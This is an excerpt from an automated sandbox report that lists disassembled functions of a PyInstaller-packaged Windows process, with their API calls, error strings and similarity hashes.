Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7E12C1108
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7E12C1098
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7E12C10CC
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7E12C11F6
fseek, xrefs: 00007FF7E12C10D3
malloc, xrefs: 00007FF7E12C110F

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 0f969e6fb3265fee7630cdf4d153662912e2351cfe086ee8c9ce282ec24edd98
Instruction ID: 6dbcc13cc60ab29eda98f8d574c6f0b47032779822d3011bcfdf55b575bbdc6b
Opcode Fuzzy Hash: 0f969e6fb3265fee7630cdf4d153662912e2351cfe086ee8c9ce282ec24edd98
Instruction Fuzzy Hash: 11415C22B0869286EB10FB11AC067B9A398BF84BC4FD44433EE4C47795DEBCE501D762

Function 00007FF7E12C1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF7E12C15E6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7E12C1518
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7E12C149F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7E12C14DE
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7E12C15DF
fseek, xrefs: 00007FF7E12C14E5
malloc, xrefs: 00007FF7E12C151F

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: ba69cb2111a26844a3bb1f636b4ed516f2970dba1f1f6f2553b333e5179dfc8e
Instruction ID: 1e45551eb6095946b4a5ee24d7cefa3ff41efbdd6b5f6c094339b1c74744a1b0
Opcode Fuzzy Hash: ba69cb2111a26844a3bb1f636b4ed516f2970dba1f1f6f2553b333e5179dfc8e
Instruction Fuzzy Hash: CB415D22B0854286EB11EB21AC023B9E398BB54784FD44833EE4D47A95DEBCE501D666

Function 00007FF7E12CEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7E12CEA65

Part of subcall function 00007FF7E12CF9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF7E12CF9FF
Part of subcall function 00007FF7E12CF9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7E12CFA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7E12CEB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7E12CED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7E12CEE98

Strings

csm, xrefs: 00007FF7E12CEB60
csm, xrefs: 00007FF7E12CEAE6
csm, xrefs: 00007FF7E12CEA7F

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: b80047ece2a6c09095f5d7f99eb1595d97a9f815f1859d40cf0a1c13094bcf88
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 3AD1A272B0874186EB20AF25D8423ADBBA8FB44798F900136DF4D57795DF78E180C752

Function 00007FF7E12C2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
MessageBoxW.USER32 ref: 00007FF7E12C2D99

Strings

%ls: , xrefs: 00007FF7E12C2D22
Error, xrefs: 00007FF7E12C2D8C
[PYI-%d:ERROR] , xrefs: 00007FF7E12C2CA6
<FormatMessageW failed.>, xrefs: 00007FF7E12C2D70

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: 187e43ec799e49da231e51653b2d225c75f837ad1fbaf07bc2a2c70cfe28270d
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 4531F622B08A4142E721BB25BC113ABA699BF88B98F814137EF4D93759DF7CD516C311

Function 00007FF7E12CDCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD4D
GetLastError.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD85
FreeLibrary.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDDF3
GetProcAddress.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDDFF

Strings

api-ms-, xrefs: 00007FF7E12CDD6D

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: de88a2c629d611537c078454b295b9c253d13256b400c749d567abecc1f2cb6a
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 8F31C522F1A60692EF12AB029C02775A39CFF48BA4FD94537DE1D56384DFBCE444C261

Function 00007FF7E12C6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Failed to load Python DLL '%ls'., xrefs: 00007FF7E12C64A7
ucrtbase.dll, xrefs: 00007FF7E12C63DD
LoadLibrary, xrefs: 00007FF7E12C64AE
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF7E12C6456
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF7E12C63C7
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF7E12C6407

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction ID: fab8920e11336db158a54e81db28b503af548b9439bab134c325a0d5914dcd32
Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction Fuzzy Hash: 41418121B18A8691EB25EB20EC163EAA319FF44340FC04133EB5D43695EFBCE515C362

Function 00007FF7E12C2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7E12C351A,?,00000000,00007FF7E12C3F23), ref: 00007FF7E12C2AA0

Strings

[PYI-%d:%s] , xrefs: 00007FF7E12C2AA8
Warning [ANSI Fallback], xrefs: 00007FF7E12C2B0F
Warning, xrefs: 00007FF7E12C2B1E
0, xrefs: 00007FF7E12C2B16
WARNING, xrefs: 00007FF7E12C2AAF

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: e87a00a17ac7ee17782615e2d05f2ad3334025735a3d0b5fada15cdec6019ce9
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 86219F32B1878186E721AB55B8427E6A298BB88380F800137FE8D93659DFBCD255C751

Function 00007FF7E12DB150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7E12DB15F
FlsGetValue.KERNEL32 ref: 00007FF7E12DB174
FlsSetValue.KERNEL32 ref: 00007FF7E12DB195
FlsSetValue.KERNEL32 ref: 00007FF7E12DB1C2
FlsSetValue.KERNEL32 ref: 00007FF7E12DB1D3
FlsSetValue.KERNEL32 ref: 00007FF7E12DB1E4
SetLastError.KERNEL32 ref: 00007FF7E12DB1FF

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
Instruction ID: cbe752d339cda4b514402ae2a68cbe1883052c87cb2be649235c8fd76e151e2b
Opcode Fuzzy Hash: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
Instruction Fuzzy Hash: 76216D22B0C24242FB657332DD6737DD14A6F497A0F804636D83E47ACADEBDE4118326

Function 00007FF7E12E7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7E12E7D9D
GetLastError.KERNEL32 ref: 00007FF7E12E7DA9
CloseHandle.KERNEL32 ref: 00007FF7E12E7DC1
CreateFileW.KERNEL32 ref: 00007FF7E12E7DEC
WriteConsoleW.KERNEL32 ref: 00007FF7E12E7E0B

Strings

CONOUT$, xrefs: 00007FF7E12E7DCD

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: bfea000aa6e60dccb14b08a83649aad203dbd2a48a814ffa7f3037fccc8b588b
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 2F11B131B18A4182E751AB52EC46329A2A8FB88BF4F844236EA5DC7794CFBCD8108751

Function 00007FF7E12C8ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8F5A

Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C9044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C9055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C906A

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction ID: 32fed1b1886a366e95b6ad5dbc68e2d71c9ae68cfe8699d04e55929775e055ee
Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction Fuzzy Hash: 5141D762B1968281EF30AB11A8013BAB398FF85BD4F854136DF4E57789DEBDD501C721

Function 00007FF7E12DB2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB2D7
FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB30D
FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB33A
FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB34B
FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB35C
SetLastError.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB377

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
Instruction ID: c2785f4d0c6c6e77735e094ba26bb851b6f48a53924aa4012a7835b23b76f85b
Opcode Fuzzy Hash: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
Instruction Fuzzy Hash: 6F118E22B0C64282FB957721DD5337D914AAF497B0F804736DC2E477D6DEBDA4114322

Function 00007FF7E12C2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E12C1B6A), ref: 00007FF7E12C295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF7E12C2966
Error, xrefs: 00007FF7E12C2A0E
Error [ANSI Fallback], xrefs: 00007FF7E12C29FF
%s: %s, xrefs: 00007FF7E12C29E8

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 54c640665c14ceb6c072caddbdcc2b4df747597f7b34f72176d4332f90c746b2
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 2E31E222B1868156E721B765AC423E7A299BF887D4F804133FE8D93759EFBCD146C321

Function 00007FF7E12C2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7E12C23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF7E12C248E
DeleteObject.GDI32 ref: 00007FF7E12C24C1
DestroyIcon.USER32 ref: 00007FF7E12C24D3

Strings

Unhandled exception in script, xrefs: 00007FF7E12C23F8

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction ID: aa0dff722b30b4cfb83da9bd7c0b966bfee5cc2ab23a599afea3be46d430aeed
Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction Fuzzy Hash: CE315222B19A8249EB21EB21EC562F9A364FF88788F844137EA4D47B59DF7CD105C712

Function 00007FF7E12C2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7E12C918F,?,00007FF7E12C3C55), ref: 00007FF7E12C2BA0
MessageBoxW.USER32 ref: 00007FF7E12C2C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF7E12C2BA8
WARNING, xrefs: 00007FF7E12C2BAF
Warning, xrefs: 00007FF7E12C2C1D

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 61fa9ac32d8e62258f04e4c59ce8d764f5ec8c28df1fdfa070871f73a747d3e8
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: 7A21B262B08B4182E711AB14F8467EAB3A8FB88780F804137EE8D97759DF7CD215C751

Function 00007FF7E12C2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7E12C1B99), ref: 00007FF7E12C2760

Strings

Error, xrefs: 00007FF7E12C27DE
Error [ANSI Fallback], xrefs: 00007FF7E12C27CF
[PYI-%d:%s] , xrefs: 00007FF7E12C2768
ERROR, xrefs: 00007FF7E12C276F

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
